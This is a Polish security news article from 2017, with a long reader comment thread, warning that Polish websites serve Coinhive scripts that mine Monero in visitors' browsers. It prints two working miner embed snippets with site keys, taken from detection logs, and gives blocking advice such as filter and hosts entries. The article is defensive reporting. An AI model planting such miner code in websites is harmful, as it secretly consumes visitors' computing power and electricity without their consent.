28.09.2017 | 16:44

Adam Haertle

Uważajcie, bo znane strony WWW kopią kryptowaluty na Waszych komputerach

Od paru dni napływają do nas zgłoszenia dotyczące nieznanych wcześniej incydentów. W mniej lub bardziej popularnych serwisach WWW pojawiają się pliki JavaScript, które obciążają procesory odwiedzających stronę kopiąc walutę Monero.

Różne metody działania przestępców i cwaniaków widzieliśmy, jednak kopanie kryptowalut na procesorach osób odwiedzających określone witryny WWW to dla nas nowość i jesteśmy pod wrażeniem kreatywności autorów tego pomysłu. Niestety strony, rozgrzewające Wasze procesory, znajdują się także w Polsce i należą do nich najpopularniejsze witryny w kraju.

Na czym polega atak

Produkowanie kryptowalut wymaga sporej mocy obliczeniowej. To kosztuje – zużywają się procesory i karty graficzne, kosztuje prąd, sprzęt się grzeje. Aby ten proces był efektywny kosztowo, musi odbywać się na dużą skalę (jak np. w wielkich fabrykach bitcoinów w Chinach) lub cudzym kosztem (jak np. botnety kopiące kryptowaluty na przejętych komputerach lub urządzeniach IoT). Ten drugi wariant zyskał niedawno dużą popularność w nowej formie. Okazało się bowiem, że jedną z popularnych kryptowalut – monero – można kopać za pomocą JavaScriptu w przeglądarce.

Gdy odwiedzacie strony WWW, Wasza przeglądarka może domyślnie wczytywać i uruchamiać znajdujące się tam skrypty. Skrypty te, pobrane z serwera, wykonywane są na Waszym komputerze. Oznacza to, ze jeżeli traficie na stronę, która chce kopać kryptowaluty, to właśnie Wasz komputer będzie się grzał i pobierał więcej prądu, by wykonywać pracę za kogoś. W dostarczaniu takich skryptów specjalizuje się firma Coinhive (konkurentem jest np. JSECoin). Jak sama wspomina na swojej stronie, jeśli w Waszym serwisie non stop kopie 10-20 osób, to możecie się z tego tytułu spodziewać przychodu w okolicach 30 dolarów miesięcznie. 70% trafia do Was, 30% do organizatorów procederu. Czysty zysk – jeśli uda się Wam uruchomić ten skrypt na cudzej stronie.

Gdzie można trafić na te skrypty

Jeden z naszych Czytelników (dzięki Paweł!) podzielił się z nami logami swojego systemu wykrywania zagrożeń, wskazującymi na obecność skryptów coin-hive w polskich serwisach WWW. Logi wyglądały tak:

http://zoomia.pl/index.html
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script type="text/javascript">
var miner = new CoinHive.Anonymous('9if7L1lYE7EhUHyxrpCQwKoBaBigDEqD');
miner.start();
</script>

http://ciasteczkowapolityka.pl/
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('fiO1mpwOSfmc2UPG8LTLz0JYKnGzqsMw','threads: 1');
miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
</script>

W tych przypadkach udało się potwierdzić obecność kodu na tych witrynach. Logi pokazały także obecność skryptu na innych witrynach, w tym należących do grupy Gazeta.pl

2017/09/18 19:48:29 myfitness.pl                     https
2017/09/19 15:46:49 myfitness.pl                     https
2017/09/19 09:26:14 ladnydom.pl                     http
2017/09/19 15:12:04 ladnydom.pl                     http
2017/09/19 08:36:21 gazeta.pl                         https

Nie udało się na czas potwierdzić obecności kodu (sprawdziliśmy kilka dni później, kiedy mógł już być usunięty), ale komputery z reguły nie kłamią. Prawdopodobnie kod mógł znaleźć się tam za pośrednictwem np. zewnętrznych reklam. Inny internauta poinformował dzisiaj na Twitterze, że złośliwy kod był także na popularnym portalu Weszlo.com:

Nie tylko w Polsce

Podobne incydenty miały miejsce ostatnio na wielu popularnych portalach, np. ThePirateBay (podobno uruchomione celowo) czy telewizji Showtime (brak informacji w jaki sposób trafił tam złośliwy kod). Złośliwy kod umieszczany jest także na licznych zhakowanych stronach oraz dystrybuowany przez złośliwe reklamy wstrzykiwane do zazwyczaj niegroźnych sieci reklamowych. Bywa także wstrzykiwany przez bramki Tor2web:

i znaleźć go dzisiaj można w setkach popularnych witryn internetowych:

Wygląda zatem na to, że będziemy na niego trafiać coraz częściej. Na szczęście wykrywa go już część programów antywirusowych i jest blokowany przez popularne wtyczki do przeglądarek. Jeśli chcecie się upewnić, że Wasz komputer nie będzie kopał cudzych kryptowalut, dodajcie do filtrów wtyczek typu AdBlock:

https://coin-hive.com/lib/coinhive.min.js

Możecie też dodać odpowiedni wpis do pliku hosts:

0.0.0.0 coin-hive.com

Wystarczy także włączyć dodatek typu NoScript lub wyłączyć uruchamianie JS w ustawieniach przeglądarki.

Aktualizacja 18:50

Od jednego z Czytelników otrzymaliśmy listę stron, które w ostatnich dniach odwoływały się do skryptów z domeny coin-hive.com. Wygląda równie ciekawie co wcześniejsze doniesienia:

123movies.co
agromet.prv.pl
beszamel.se.pl
bpsc.com.pl
codingforums.com
dzienniklodzki.pl
dziennikpolski24.pl
echodnia.eu
express.olsztyn.pl
expressilustrowany.pl
faucethub.io
gazetakrakowska.pl
gazetalubuska.pl
gazetawroclawska.pl
gloswielkopolski.pl
igpw.pl
iq-tester.pl
katowice.naszemiasto.pl
konkol.pl
kurierlubelski.pl
lodz.naszemiasto.pl
m.se.pl
motofakty.pl
muratordom.pl
nowiny24.pl
nto.pl
parkiet.com
patrz.pl
podroze.se.pl
poradnikzdrowie.pl
rp.pl
se.pl
superbiz.se.pl
szczecin.naszemiasto.pl
telemagazyn.pl
thepiratebay.org
tomasz.topa.pl
twojastancja.pl
urodaizdrowie.pl
vegas-panel.panelradiowy.pl
warszawa.naszemiasto.pl
weszlo.com

Obecność na tej liście poważanych tytułów prawdopodobnie świadczy o rozsiewaniu skryptów przez systemy reklamowe.

Powrót

Komentarze

  • 2017.09.28 17:43 Dytryk

    Wydaje się, że można to potwierdzić. Mi wczoraj gdata zaproponowała złośliwy skrypt który chciał się uruchomić związany z koparką.

    Odpowiedz
  • 2017.09.28 17:53 Adam [ale nie autor Z3S]

    Mam jedynie nadzieję, że do wyłączenia tych koparek JS potrzeba jedynie zamknąć kartę przeglądarki. Bo jeśli jest inaczej, to jest to kolejny dowód na to, że obecne komputery są w przypadkach krytycznych droższe i mniej warte, niż stare pióro i papier…

    Druga sprawa to sam fakt, że firma z takim produktem może się normalnie zarejestrować i reklamować – czysty kapitalizm… jeszcze te hasła, jak być pro-eko zużywając nadmiernie moc obliczeniową odwiedzających. Ciekawe, czy UE podchwyci uzasadnienie pro-eko i kiedy będzie wymagać od dużych serwisów takich skryptów na stałe… :D

    Odpowiedz
    • 2017.09.28 18:03 Paweł

      UE? Po 18 miesiącach zaciekłych dyskusji na temat winnych przejdą do ukarania niewinnych. Zapewne przy pomocy nowej dyrektywy, która wyniesie na fotel komisarza kolejnego przy*upasa.

      Odpowiedz
      • 2017.09.28 18:11 Adam [ale nie autor Z3S]

        Nie wiem, czy mnie dobrze zrozumiano. Mi chodziło o poniższy tekst JSECoin, promujący te wtyczki:

        „Problems We Are Trying To Solve
        1. Bitcoin consumes more electricity than Cuba
        2. Webmasters want new ways to monetize their sites

        (…)

        The entire network consumes the same amount of electricity as 1,500,000 households and the consumption of miners is growing at around 1TW/hr per month. The competitive nature of traditional cryptocurrency mining means that as prices rise more and more power is being consumed by the network because this is the only cost to miners once the hardware is purchased. The most competitive mining companies are industrial server farms setup next to power stations with access to cheap wholesale electricity. JSEcoin is mined using surplus CPU resources which would be otherwise wasted. Browser mining has a huge environmental and cost advantage over existing cryptocurrency networks.”

        Odpowiedz
        • 2017.09.29 16:49 Piotr

          stek bredni -jak kopanie na procku moze byc bardziej ekologiczne? argument o tym ze bedzie wykorzystana nieuzywana moc jest smieszny. przeciez jak proc bedzie kopal to dopiero bedzie ssal prad jak szalony, w dodatku procek nie nadaje sie kompletnie do kopania btc, oraz prawie kompletnie do kopanoa czegokolwiek innego. szukaja frajerow.

          Odpowiedz
          • 2017.10.02 11:15 kamil

            procek nadaje się do kopania monero, bo to waluta nastawiona tylko na cpu. Idea monetyzacji w ten sposób sama w sobie nie jest zła o ile poinformuje się o tym użytkowników „widzisz – nie ma wkurwiających reklam, ale wykorzystujemy Twoją moc obliczeniową do zarabiania hajsów”, a nie kopanie w ukryciu jak jakiś cygan na wysypisku

          • 2017.10.18 18:56 Krzysiu

            Nie zawsze, ale CPU może być bardziej eko – dużo osób (tylko ile – to ważne) kupuje specjalne karty graficzne do kopania, co ma odpowiedni ślad węglowy. Do tego zużycie prądu przez zwykłą kartę graficzną wcale nie musi być niższe od CPU. Wiem, naciągane, ale nie chcę bronić tezy, a jedynie pokazać jedno z rozwiązań.

    • 2017.09.28 20:47 HWDJS

      Jak UE się za to weźmie to jeszcze JS zdelegalizują… W sumie nie byłoby to takie złe…

      W nienawiści do JS, tak zostałem wychowany

      Odpowiedz
      • 2017.09.29 01:36 mk

        you make my day

        JJS na 100%

        Odpowiedz
      • 2017.10.01 17:40 dfrgerytgearytg

        CSS to też zło, tylko strony na tabelkach i stała szerokość 900px ..
        a nie sorry… wróćmy do telegazety

        Odpowiedz
        • 2017.10.07 18:49 Robert

          Ty się już tych tabelek nie czepiaj. Żeby wyśrodkować treść na stronie używałeś 2 tabelek/linijek teraz masz 2 strony a4 kodu jedna js druga css żeby zrobić to samo… Niezły postęp. Jak czytam też niektóre tricki które wymyślają webmasterzy żeby uzyskać proste do wykonania kiedyś rzeczy jak np przyklejona stopka do dołu to mam wrażenie że to idzie nie w tym kierunku co powinno. Zresztą już widzę że sporo osób tego nie ogarnia a często się to zdarza w agencjach reklamowych które zatrudniają uczniaków a potem wrzucam stronę w walidatora a on się zawiesza na 10 linijce?!? co u licha, wrzucam w analizator niezamkniętych tagów i okazuje się że cały szablon to rozsypka bo w wp jest w częściach i ktoś nie ogarnął co otworzył i gdzie zamknąć…

          Odpowiedz
      • 2017.10.01 23:44 nice

        Szanuję :)

        Odpowiedz
  • 2017.09.28 17:57 janQ

    Można też:
    – używać dodatku https://www.eff.org/privacybadger
    – w jakimś adblokerze mieć listy
    + nocoin https://github.com/hoshsadiq/adblock-nocoin-list
    + Easy Privacy https://easylist.to/

    Odpowiedz
    • 2017.09.28 22:20 gat

      PrivacyBadger OOTB nie pomaga na coinhive. Wszedłem z włączonym na jedną ze stron z artykułu – JSy wczytały się bez problemu.

      Odpowiedz
      • 2017.09.29 22:19 janQ

        Privacy Badger się uczy z czasem jak się chodzi po stronach. Ja sam go używam od dawien dawna i mi blokuje na wejściu takie skrypty.

        https://snag.gy/hYn8T5.jpg

        Zawsze możesz mu też samemu wskazać aby blokował. Dasz tak na 2-3 stronach i potem pójdzie już z górki.

        Odpowiedz
  • 2017.09.28 18:04 MMs

    Słaba ta wasza rada, bo mają też domenę: https://coinhive.com/lib/coinhive.min.js. Niekończonca się walka..

    Odpowiedz
  • 2017.09.28 18:27 Jackolo

    A co gdyby dało się odwrócić sytuację i zmusić serwer jakimś requestem do kopania mojej waluty z mojego wstrzykniętego skryptu??

    Odpowiedz
    • 2017.10.13 17:21 gosc

      Raczej tak: Eksploatować do maksimum użytkowanie WGeta. Z resztą ja zapisuję interesujące strony, mam tego mały katalog, do którego wracam, bo 3/4 już nie ma a połowy nie ma w Wayback Machine. Potem po prostu wycinam JS z wyniku.
      No i oczywiście NoScript – jeżeli do wyświetlenia tekstu potrzebny jest JS – zakładam, że strona jest szkodliwa.

      Odpowiedz
  • 2017.09.28 18:50 JonQ

    exsite24.pl też

    Odpowiedz
  • 2017.09.28 19:29 Poszkodowany

    Potwierdzam. Koparka zadomowiła się również na mojej stronie i straciłem mnóstwo czasu żeby ją usunąć. Kryptowaluty powinny zostać zdelegalizowane, bo wyrządzają szkody podobne do działań wirusów. Tylko unieważnienie kryptowalut i sprowadzenie ich do zerowej wartości uwolni nas od tego problemu.

    Odpowiedz
    • 2017.09.28 21:20 IMs

      Zatem także wolność słowa powinna być zdelegalizowana, ponieważ większość społeczeństwa nie ma nic do powiedzenia?

      Odpowiedz
    • 2017.09.28 21:55 udfkjah

      to mniej więcej tak, jak byś żądał zakazania samochodów bo ktoś, kto Ci okradł dom poruszał się samochodem.

      Odpowiedz
    • 2017.10.06 02:09 Grzesiek

      Witaj
      Mam ten sam problem, możesz opisać co należy zrobić żeby się tego pozbyć z witryny ?
      Pozdrawiam

      Odpowiedz
      • 2017.10.07 18:53 Robert

        Najpierw przeskanować swój komputer. Najczęściej takie rzeczy dopisują się poprzez kradzież z twojego komputera hasła do ftp zapisanego na stałe w kliencie np Filezilla. Jak się pozbędziesz syfa zmiana hasła do ftp i aktualizacja strony.

        Odpowiedz
  • 2017.09.28 20:03 Jon

    Są strony które… „legalnie” proponują wydobywanie a w zamian naliczają ułamki BTC,
    np. https://mining.freebitco.in/mining.html?userid=6639507&auth=225474d4e3b0b08da66dc80a86c5d8ca1125082f2ff8d31d798568f648f6fd99
    https://coinpot.co/mine/bitcoin

    W obu przypadkach, tak mi się wydaje, wejście na stronę nie obciąża procesora, ale kliknięcie START MINNING to wydajność procesora natychmiast rusza do 100%

    Odpowiedz
  • 2017.09.28 20:05 Jon

    Przy okazji, może ktoś opracuje wtyczkę: brzęczek, która będzie sygnalizować po przekroczeniu obciążenia procesotra np 80%+

    Odpowiedz
    • 2017.09.29 03:44 Madrala

      No w laptopie wentylator zaczyna szumieć. Lepiej żeby skrypt na stronie mial niski priorytet i ograniczenie do 20-30% CPU.

      Odpowiedz
  • 2017.09.28 20:28 Monter

    TPB uruchomił kopanie w ramach testu, napisali o tym na swoim blogu.

    A co do listy domen – gdzie Adam widzisz na niej te „poważne tytuły”? Ja żadnych poważnych nie widzę.

    Odpowiedz
  • 2017.09.28 20:29 Duży Pies

    Dla Chrome’a jest AntiMiner.
    .
    Czy Ghostery/uBlock/NoScript blokują już to kurestwo?

    Odpowiedz
    • 2017.09.29 07:15 fr0zen

      NoScript tak, o ile masz dobrze skonfigurowanego. Z reszta nie wiem bo nie testowałem :)

      Odpowiedz
    • 2017.09.29 11:31 Illuminati

      Nie blockuje domyślnie ale jak się nim pobawisz to zablokujesz. A jak byś chciał się upewnić czy na pewno zablokowałeś to dziadostwo to wystarczy wejść na strone https://coin-hive.com/ i włączyć kopanie. Bez blockerów będą ci się pokazywać kolumny i różne cyferki, a jak zablokujesz to nie będzie kolumn a liczniki będą stać na liczbie 0.
      Masz tu poradnik, gdzie to można zablokować w ublocku, jak byś sobie nie poradził. https://www.youtube.com/watch?v=SIYcI2tEqo8

      Odpowiedz
  • 2017.09.28 21:17 emes

    To akurat dobry sposób by utrzymywać popularną stronę bez reklam. Oczywiście czytelnicy powinni zostać poinformowani.

    Ale „zużywają się procesory i karty graficzne” mogliście sobie odpuścić. Ile instrukcji może wykonać współczesny CPU nim się „zużyje”? :D

    Odpowiedz
    • 2017.09.29 08:20 Adam

      Tutaj chodzi o to, że np. wygrzewa się pasta, a stosunkowo niewielu użytkowników wie w ogóle co to jest…
      Ponadto tak, procesory plus minus się zużywają i spada ich wydajność w trakcie użytkowania ;)

      Odpowiedz
      • 2017.09.29 09:24 Duży Pies

        Ta pasta się utlenia, starzeje się, traci swoje właściwości – tak powinien napisać inżynier, jeśli już;)
        .
        No i szybkość tego procesu zależy także od jakości pasty i jej składu (np. są pasty z drobinami tlenków metali które lepiej przewodzą ciepło) oraz od poprawności mocowania radiatora i dobrego odprowadzania ciepła (wydajny wentylator i dobrze zaprojektowany wylot ciepła z obudowy komputera).
        .
        Generalnie chodzi o zużycie energii elektrycznej (wyższe rachunki za prąd) oraz o szybsze zużycie baterii w laptopach (niektóre laptopy nawet gdy są podłączone do gniazdka sieciowego ~220/230 V, to i tak zasilają płytę główną napięciem z baterii).

        Odpowiedz
    • 2017.09.29 08:28 Przemo

      A co jeśli otworzysz 10 kart i każda będzie chciała kopać? To nie jest dobry pomysł.

      Odpowiedz
      • 2017.10.01 21:17 Ivellios

        To wtedy karty „podzielą” się procesorem. Nie ma czegoś takiego, że 10 kart spowoduje 1000% obciążenia procesora i biedne maleństwo wyparuje od nadmiaru kryptoinby ;)

        Odpowiedz
  • 2017.09.28 22:40 Tomek

    W jaki sposób taki skrypt ląduje na stronie, na przykład gazeta.pl? Czy to nie wymaga dostępu do kodu strony, a więc umyślnego umieszczeenia skryptu lub też włamania na serwer?

    Odpowiedz
    • 2017.09.28 22:56 Adam

      Byc może przez reklamy, wyświetlane z zewnętrznego serwera, które nie były dość dobrze sprawdzone przez firmę go obsługującą.

      Odpowiedz
      • 2017.09.29 07:59 Gallar

        Nie do końca.

        Jakiś czas temu była próba dostania się do moich serwerów i dodania właśnie koparki do naszej podstrony. Atak był prosty. Próbowali dostać się poprzez stare dziury we frameworku. Jeśli ktoś na bierząco się łatał, to nie powinno być problemów.

        Odpowiedz
  • 2017.09.29 06:44 Radek

    Nie padła chyba odpowiedź: czy ktoś wie, czy po zamknięciu przeglądarki przestaje kopać? Coś pozostaje, trzeba usuwać?

    Radek

    Odpowiedz
    • 2017.09.29 07:19 fr0zen

      Z tego co testowałem na konsoli Xbox one to po wyłączeniu przeglądarki nadal kopal czyli skrypt JS musiał być dalej gdzieś odpalony. :)

      Odpowiedz
    • 2017.09.29 12:22 gosc

      Skrypt JS wczytywany przez strone HTML poprzez tag dziala tylko dla tej konkretnej strony i tylko tak dlugo, jak strona jest otwarta. Zamkniecie karty konczy proces i zaden skrypt JS z tej strony juz dalej nie dziala.

      Odpowiedz
    • 2017.10.15 01:57 Adam [ale nie autor Z3S]

      Ogólnie JS danej strony przestaje być przetwarzany po zamknięciu karty, więc zamknięcie karty lub po prostu zmiana przeglądanej strony powinny wystarczyć.

      Żeby było inaczej, to by musieli dokonywać jakiejś interakcji z dodatkami, zainstalować coś lub użyć 0-daya, ale o tym Adam nic nie pisał, a w opisie CoinHive takiej funkcji brak. Tamto moje pytanie wyżej było bardziej pytaniem retorycznym i wskazaniem na ten kolejny poziom marketingu przedstawiony przez JSECoin.

      Odpowiedz
  • 2017.09.29 07:45 hukos

    Witam.

    Czy problem dotyczy tylko komputerów PC / MAC czy również telefonów?

    Hukos

    Odpowiedz
    • 2017.09.30 22:08 Marek

      Dotyczy to wszystkich urządzeń z włączoną obsługą javascript.

      Odpowiedz
  • 2017.09.29 08:00 OnlyOne

    I to to jest w pełni legalne? Nie informowanie użytkownika i wykorzystanie jego sprzętu może obejść się bez żadnych konsekwencji prawnych?

    Odpowiedz
    • 2017.09.29 12:27 fergun

      A czym to się rózni od odpalania innego javascriptu? Też zużywa twoje zasoby, a jeśli służy śledzeniu/wyświetleniu reklamy, to też daje zarobić włascicielowi strony

      Odpowiedz
  • 2017.09.29 08:06 Przemek

    Oj gdyby taki skrypt pojawił się na FB – masa kasy :)

    Odpowiedz
  • 2017.09.29 08:07 Cyb

    te ostatnie strony dzienników szczególnie maja w head prawie identyczne skrypty (może to przehackowany serwer reklamowy/skrypt portalowy?) skrypty pochodzą z http://s-nm.ppstatic.pl/ , możliwe, że stamtąd wstrzykuje się dodatkowym skryptem coinhive

    Odpowiedz
  • 2017.09.29 09:12 Unknown

    Kto sponsoruje ten artykuł napisany w alarmującym tonie? Google czy inny wydawca reklam? Zużycie karty graficznej i procesora? Zwykłe skrypty do reklam nie zużywają niby? To czemu po wejściu na stronę ze zwykłymi reklamami, zwłaszcza animowanymi, wiatrak wyje? Więc jaki znowu atak? Taki, że storna nie jest zaśmiecona, zyski trafiają do właściciela strony z pominięciem gigantów branży reklamowej? Skrypt do kopania nie musi być ustawiony na 100% wydajności i wcale nie musi obciążać komputera odbiorcy bardziej niż skrypty do zwykłych reklam.

    Odpowiedz
    • 2017.09.29 21:28 Adam

      Soros

      Odpowiedz
      • 2017.09.29 22:52 Hau Hau

        Wiesz Adamie że teraz zostałeś dla niektórych lewakiem?
        .
        Nie wiem czy to dobre przyznawać się do lewicowości w dzisiejszych czasach…
        .
        Możesz stracić klientów z prawej strony na pentesty i warsztaty które organizujesz, a anarchiści z Antify i lewackie bojówki z miejskiej partyzantki nie dadzą Ci zarobić;)

        Odpowiedz
        • 2017.10.01 23:47 ja

          Prawak wykryty………………….

          Odpowiedz
        • 2017.10.10 17:42 Diego Wątroba

          @Hau Hau – przez takich jak ty robi sie burdel w komentarzach. Ludzie nie przyszli czytac takich farmazonow.

          Odpowiedz
  • 2017.09.29 09:16 wilkuwzd

    dwudziesty osmy dzien wrzesniowy
    by nienawidzic JS powod mialem nowy…

    Odpowiedz
  • 2017.09.29 09:55 Rozbawiony

    Czy istnieje jakas strona na ktorej mozna sprawdzic podatnosc na kopanie?

    Dosc zbiorcza jest browserleaks.com ale kopania jeszcze nie testuja.

    Odpowiedz
  • 2017.09.29 10:21 Rafał

    „zużywają się procesory i karty graficzne” Serio? Macie na to jakiś dowód(badania naukowe, wiarygodne testy itp.) poza plotkami, które są powtarzane przez prawie wszystkie portale wannabe techniczne?

    Kopanie(a już na pewno nie kopanie dorywcze tak jak w przypadku wejścia na taką stronę) nie ma żadnego wpływu na procesor/kartę graficzną o ile zachowane są odpowiednie temperatury procesora, które i tak ograniczy throttling. Ktoś musiałby mieć na prawdę zasyfiony komputer, żeby taka chwila wysiłku na procesora miała na niego zgubny wpływ.

    Odpowiedz
    • 2017.09.29 11:13 Duży Pies

      Niektóre procesory mogą być wykonane z materiału (wafla krzemowego) gorszej jakości – w nich prawdopodobnie szybciej zajdzie proces zmęczeniowy wywołany pracą na wysokich (granicznych) temperaturach.
      .
      Większość procków dla zastosowań niemilitarnych i nieserwerowych nie jest dobrze wyselekcjonowana – szczególnie dotyczy to procków w segmencie ekonomicznym.

      Odpowiedz
    • 2017.09.29 11:16 Rozbawiony

      To JA decyduje co ma wplyw na moj sprzet, a nie Ty cwaniaczku.

      Odpowiedz
      • 2017.09.29 12:34 fergun

        Nie decydujesz, decydują o tym inżynierzy projektujący twój sprzęt

        Odpowiedz
        • 2017.09.29 17:33 Rozbawiony

          Serio? A w jakiz to sposob owe „inzyniery” maja mi dyktowac, czy bede dla Januszy kopac, czy nie kopac? Prosze o konkretna odpowiedz, a nie pitolenie z sufitu.

          Odpowiedz
    • 2017.09.29 12:27 asad

      U mnie sie zużył zielony kolor, teraz nie bedzie wiesny:)

      Odpowiedz
  • 2017.09.29 10:48 M

    U mnie same dodanie „https://coin-hive.com/lib/coinhive.min.js” do uBlocka nie zadziałało. Dodałem coin-hive.com i coinhive.com do listy Moich filtrów, no i działa :)

    Odpowiedz
  • 2017.09.29 12:02 slav

    pocieszne to dodawanie domen do blokerów, oj ludzie ludzie

    Odpowiedz
  • 2017.09.29 13:09 Domker_

    Możecie też skorzystać z listy IP coin-hive do zablokowania przez firewall.
    https://goo.gl/LYyBS4

    Coin-hive ma sporo swoich własnych serwerów proxy. Poza tym nie tylko poprzez strony może być kopana waluta, ale też przez uzłośliwione rozszerzenia do przeglądarek i aplikacje.
    Dlatego warto zablokować globalnie.
    Można również dodać do routera wtedy dla wszystkich podłączonych urządzeń będzie blokowane.
    Listę trzeba raz na jakiś czasu uaktualniać, ponieważ serwery proxy są włączane i wyłączane selektywnie, co ma utrudnić blokowanie.

    Odpowiedz
  • 2017.09.29 15:35 kravietz

    Dodałem sygnaturkę do https://webcookies.org/reputation/suspicious/ wykrywa Coinhive (dwie domeny), JSECoin i kilka innych, mniej znanych. Już parę złapał, np. https://webcookies.org/reputation/suspicious/84521

    Odpowiedz
  • 2017.09.29 21:08 mac

    Hmm, gdyby tylko użytkownik był informowany – „Hej, chcesz pokopać dla mojej strony?” oraz gdyby dało się wysterować zużycie procesora (żeby nie zawalał 100% tylko powiedzmy 40-50) to ja wolę takie coś niż cholerne reklamy. Poważnie.

    Odpowiedz
  • 2017.09.29 21:57 x

    Teraz strony zawierają tyle niepotrzebnego javascriptu, że i bez kopania są w stanie zwiesić nie jeden komputer. Kopanie kryptowalut to taka wisienka na torcie. Swoją drogą ciekawe jak będzie za kilka lat. Ludzie to jednak wszystko potrafią zniszczyć.

    Trudno się potem dziwić, że takie zacne projekty jak tor i kryptowaluty kojarzą się przeciętnemu kowalskiemu wyłącznie negatywnie.

    Odpowiedz
  • 2017.09.30 16:40 X0r

    z tego był znany karachan w 2014…

    Odpowiedz
  • 2017.10.01 11:39 Damian

    Kopanie poprzez procesory użytkowników jest bezprawne, dopóki nie wyrażą oni na to zgody. W przypadku braku uzyskania zgody administrator naraża się na odpowiedzialność karną i karę pieniężną -> http://www.poradyprawo.pl/2017/10/01/czy-ktos-moze-kopac-bitcoiny-na-twoim-komputerze/

    Odpowiedz
    • 2017.10.02 15:38 Badu

      No nie do końca. Użytkownik sam wchodzi na stronę, sam decyduje się na niej zostać… więc żadne pierdololo prawne nic Ci nie pomoże. Co innego gdyby kopanie trwało poza przeglądaną stroną.

      Odpowiedz
      • 2017.10.02 18:45 Rozbawiony

        To wyciag z przepisow prawa ugandyjskiego?

        Odpowiedz
        • 2017.10.02 23:00 Damian

          Czyli jeśli użytkownik wchodzi na stronę internetową i na niej jest to automatycznie też wyraża zgodę np. na cookies? Gdyby Wasz tok rozumowania był prawidłowy to nikt nie wprowadziłby np. art. 173 ustawy prawo telekomunikacyjne, który wymusił informowania użytkowników o cookies i możliwość ich zablokowania przez przeglądarkę.
          Btw. jeśli chcecie to znajdziecie te przepisy tutaj: http://isap.sejm.gov.pl/

          Odpowiedz
          • 2017.10.06 09:13 Gosc

            Bzdury w tym linku. Skrypt „kopiący” od strony progrsmistycxnejj w zakresie udostępnienia informacji w rozumieniu tego przepisu niczym nie różni się od kodu js np. animowanej reklamy. Wg powyższej interpretacji użytkownika trzebaby było prosić o zgodę przed wyswielteniem każdej reklamy. Wykonywanie kodu JS NIE polega na „dostępie do całości lub część systemu informatycznego” w rozumieniu tego przepisu. Wykonanie kodu js jest usługą świadczoną przez przeglądarkę w zakresie jakie definiuje usługa http. Niesamowite jak osoby nie mające bladego pojęcia o narzędziach i usługach informatycznych próbują dopasować swoje błędne wyobrażenie o nich do istniejących przepisów tworząc takie potworki interpretacyjne. Sprawa „zgody cookies” i interpretacji tego art. do cookies jest typowym przykładem próby regulacjiobszarow, które nie do końca się rozumie.

          • 2017.10.06 13:35 Wredny

            Brawo Panie Damian! No i choć jeden Damian rozumie to co prawem jest stanowionym! Szkoda, że tak mało ludzik, a zwłaszcza w sektorze IT, widzi coś więcej niż tylko czubek własnego nosa! Gdyby więcej speców od IT miało pojęcie o obowiązującym prawie, to znacznie mniej byłoby problemów i wylewania później żali (żalów), że komputer zaaresztowano.

          • 2017.10.06 23:58 Damian

            Czy animowana reklama może wpływać na konkretne obciążenie procesora tzn. ustawić je na poziomie 30, czy też 80 % obciążenia procesora? Gdyby tak było, to z pewnością powyższe przepisy miałyby zastosowanie także do nich. Zdaje się, że nie zrozumiał Pan sedna problemu.

  • 2017.10.15 16:10 Karol

    Osobiście wolałbym, żeby na stronach zamiast reklam (zwłaszcza w formie samoodtwarzających się filmów) pracowały sobie te koparki w tle. Strona zapchana reklamami także potrafi maksymalnie obciążyć procesor. Jednocześnie strony zarabiające w ten mniej denerwujący sposób powinny informować o tym użytkownika oraz dawać możliwość wyłączenia tej funkcji (co byłoby ważne podczas przeglądania na laptopie/telefonie).

    Odpowiedz
  • 2017.10.19 07:09 Tom

    Mi wysyakuje komunikat antywirusa o tym,jak wchodze na facebooka

    Odpowiedz
  • 2017.10.21 21:07 Antygena

    Dzisiaj osłona www antywirusa uratowała mnie przed „kopaniem” kiedy łączyłam się przez proxy z libra.ibuk.pl…

    Odpowiedz
    • 2017.10.25 20:35 Informatyk

      Też się na to natknąłem – zastanawiałem się czemu tak wolno chodzi ta strona, a przeglądarka nagle zaczyna zużywać 50% procesora.
      Ogólnie jestem za umiarkowanym kopaniem na stronach, szczególnie prywatnych, ale to już jest gruba przesada, bo uczelnie płacą (z państwowych pieniędzy btw) za dostęp do Libry dla studentów.

      Odpowiedz
  • 2017.10.30 09:25 k3||3r

    no cóż jak widać ludzia się nie nauczą…. ja tam wolę decydować co ma się uruchomić, a nie co mam zablokować… a więc domyślnie JS mam wyłączone.. może jest i to uciążliwe na starcie, ale nie mam problemu z reklamami, syfem, a do netu spokojnie cela N2840 z FF przy kilkunastu kartach ma obciążenie rzędy 7-13%….

    i nie używam żadnych AV i innego badziewia :)

    UŻYWAM ZA TO:
    1. głowy,
    2. ja jestem panem komputera, a więc uruchamia tylko to na co ja pozwolę
    3. fwall… ale dobrze ustawiony… w kilku warstwach i nic więcej mi nie potrzeba…

    Odpowiedz
  • 2017.10.30 09:34 k3||3r

    co ciekawe.. adview.pl, adkontekst.pl, adform.pl….. też go ma i lokuje nawet na podstronach wp, onet, o2….. i połowie syfu .pl

    Odpowiedz
  • 2017.12.02 20:54 Magdalena

    LEPSZE TO NIŻ WKURZAJĄCE REKLAMY, GRATULUJĘ W KOŃCU WYJŚCIA DOBREGO :)

    Odpowiedz
  • 2017.12.15 14:51 uniqe

    Podejrzewam, że wp też kombinuje z kopaniem, przez zablokowaniem domeny i.wp.pl obciążenie proca nie schodziło poniżej 80%, a po blokadzie jest to góra 0,5% ;). Mogę się mylić, nie wiem. Czy ktoś może potwierdzić?

    Odpowiedz
  • 2017.12.18 17:52 Brum

    Na chwilę obecną jedna reguła w blokerze dezaktywuje cały przemysł kopania na procesorach użytkowników:
    |blob:
    Nie widziałem zastosowania blob do czegokolwiek innego w sieci. Nie potrzeba blokować żadnych skryptów.

    Odpowiedz
  • 2017.12.29 19:16 aa

    Pebx kopie

    Odpowiedz
  • 2018.01.04 16:46 miki

    Moze sie myle ale jakos dziwnie zachowuje sie strona z filmami alltube.tv.Po wejsciu procek zaraz skacze a wentylatory zaczynaja dmuchac.Po uzyciu noscript az do momentu odblokowania CPU dziala normalnie.Szkoda by bylo jakby zaczeli kopac.

    Odpowiedz
  • 2018.01.04 16:54 migo

    Vidoza.net
    We ask that you allow us to use a little bit of your CPU to mine cryptocurrency, this helps us to reduce ads and stay alive.
    If you want you can cancel mining.

    Przynajmniej pytaja

    Odpowiedz
  • 2018.01.07 12:48 tomas

